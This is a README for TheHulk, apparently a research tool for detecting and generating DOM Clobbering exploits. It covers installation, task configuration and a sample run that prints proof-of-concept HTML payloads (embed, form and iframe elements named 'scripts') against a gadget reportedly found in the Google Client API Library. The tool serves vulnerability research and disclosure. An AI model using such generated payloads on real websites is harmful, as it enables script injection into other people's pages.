TheHulk
TheHulk is a dynamic analysis tool designed to detect and exploit DOM Clobbering vulnerabilities.
Install / Use
/learn @jackfromeast/TheHulkREADME
TheHulk
TheHulk is a dynamic analysis tool designed to detect and exploit DOM Clobbering vulnerabilities.
Overview
TheHulk operates in three key phases:
-
Gadget Detection with Dynamic Taint Analysis: TheHulk performs dynamic taint analysis in the browser to track dangerous dataflows at runtime for a given input URL.
-
Exploit Generation with Symbolic DOM: Using the recorded taint traces from the first phase, TheHulk collects and solves constraints along the trace to generate DOM Clobberable HTML markups as exploits.
-
Exploit Verification: TheHulk injects the generated HTML payload into the target webpage and hooks the dangerous sinks to verify exploitability.
Installation
To install TheHulk, follow these steps:
git clone --recursive https://github.com/jackfromeast/TheHulk.git
- Run the installation script:
cd TheHulk && ./install.sh
-
Install the mitm-proxy certificate: To instrument the HTTPS traffic with mitmproxy, you would need to install the mitm-proxy's certificate in our system and browsers (for Chrome) to avoid any complain about untrusted certificates. To do so, please follow: https://docs.mitmproxy.org/stable/concepts-certificates/#:~:text=chrome
-
Basic Test for installation:
./tasks/ae-run-basic-check/run.sh
Running
TheHulk can be run in two modes: as a standalone module or as a pipeline task.
Running TheHulk with Tasks
Tasks helps you define the input, output, and configurations of an analysis task for better pipeline orchestration. A typical task directory includes the following components:
inputfolder: Holds the list of URLs for analysis.outputfolder: Stores the analysis results for each site or page.callbacksfolder: Contains JavaScript-defined callback functions that the crawler invokes during execution.config.browser.ymlfile: Configuration file for the taint analysis engine.config.scheduler.ymlfile: Configuration file for the crawler.run.shfile: Entrypoint script to start the task.
For example, to detect and exploit the gadgets in the DOM Clobbering collection, you could simply:
- Update the two configuration files located at
tasks/ae-run-gadget-detection-e1.
- 1-1. Update the
WORKSPACEpath to specify where the output folders will be placed. - 1-2. Config the inputs, browser configs and callbacks if necessary (can be skiped).
- Start the task:
./tasks/ae-run-gadget-detection-e1/run.sh
Running Dynamic Taint Engine Only
Even Hulk is designed to detect DOM Clobbering gadgets, its dynamic taint engine can be generilzed to detect other client-side vulnerabilities. The source code of the taint engine is located at: gadget-detection/runtime-analysis/src.
- Update the configuration file located at
gadget-detection/browser/config.browser.yml.
- 1-1. Update the
WORKSPACEpath to specify where the output folders will be placed. - 1-2. Config the inputs, browser configs and callbacks if necessary (can be skiped).
- Start the taint-aware browser:
./gadget-detection/run.sh
Note: You can adjust the '--force-device-scale-factor=1.75' argument in the configuration file to change the browser's resolution. This setting provides optimal resolution for checking the source code, but it might be too large for viewing web pages. Adjust as necessary for your display.
Running Exploit Generation Module Only
To generate DOM Clobberable HTML markups from a taint trace using the following command:
node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json
Example
Below is a screenshot of an analysis result for detecting a DOM Clobbering gadget in the Google Client API Library.
<img src="https://github.com/jackfromeast/TheHulk/wiki/assets/moti-example.jpg">The exploit generation output:
$ node exploit-gen/src/exploit.js --trace exploit-gen/src/tests/motivating-example.json -c exploit-gen/src/tests/motivating-example-conditions.json
====================
<embed name="scripts">
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
<form name="scripts"></form>
<iframe name="scripts" src="" id="0">alert("Hulk!")</iframe>
====================
DOM Clobbering Collection
DOM Clobbering Collection is list of wildly-used client-side libraries with DOM clobbering gadgets that found by Thehulk.
The dataset is available at https://github.com/jackfromeast/dom-clobbering-collection.
Related Skills
clearshot
Structured screenshot analysis for UI implementation and critique. Analyzes every UI screenshot with a 5×5 spatial grid, full element inventory, and design system extraction — facts and taste together, every time. Escalates to full implementation blueprint when building. Trigger on any digital interface image file (png, jpg, gif, webp — websites, apps, dashboards, mockups, wireframes) or commands like 'analyse this screenshot,' 'rebuild this,' 'match this design,' 'clone this.' Skip for non-UI images (photos, memes, charts) unless the user explicitly wants to build a UI from them. Does NOT trigger on HTML source code, CSS, SVGs, or any code pasted as text.
openpencil
2.1kThe world's first open-source AI-native vector design tool and the first to feature concurrent Agent Teams. Design-as-Code. Turn prompts into UI directly on the live canvas. A modern alternative to Pencil.
openpencil
2.1kThe world's first open-source AI-native vector design tool and the first to feature concurrent Agent Teams. Design-as-Code. Turn prompts into UI directly on the live canvas. A modern alternative to Pencil.
ui-ux-pro-max-skill
59.8kAn AI SKILL that provide design intelligence for building professional UI/UX multiple platforms
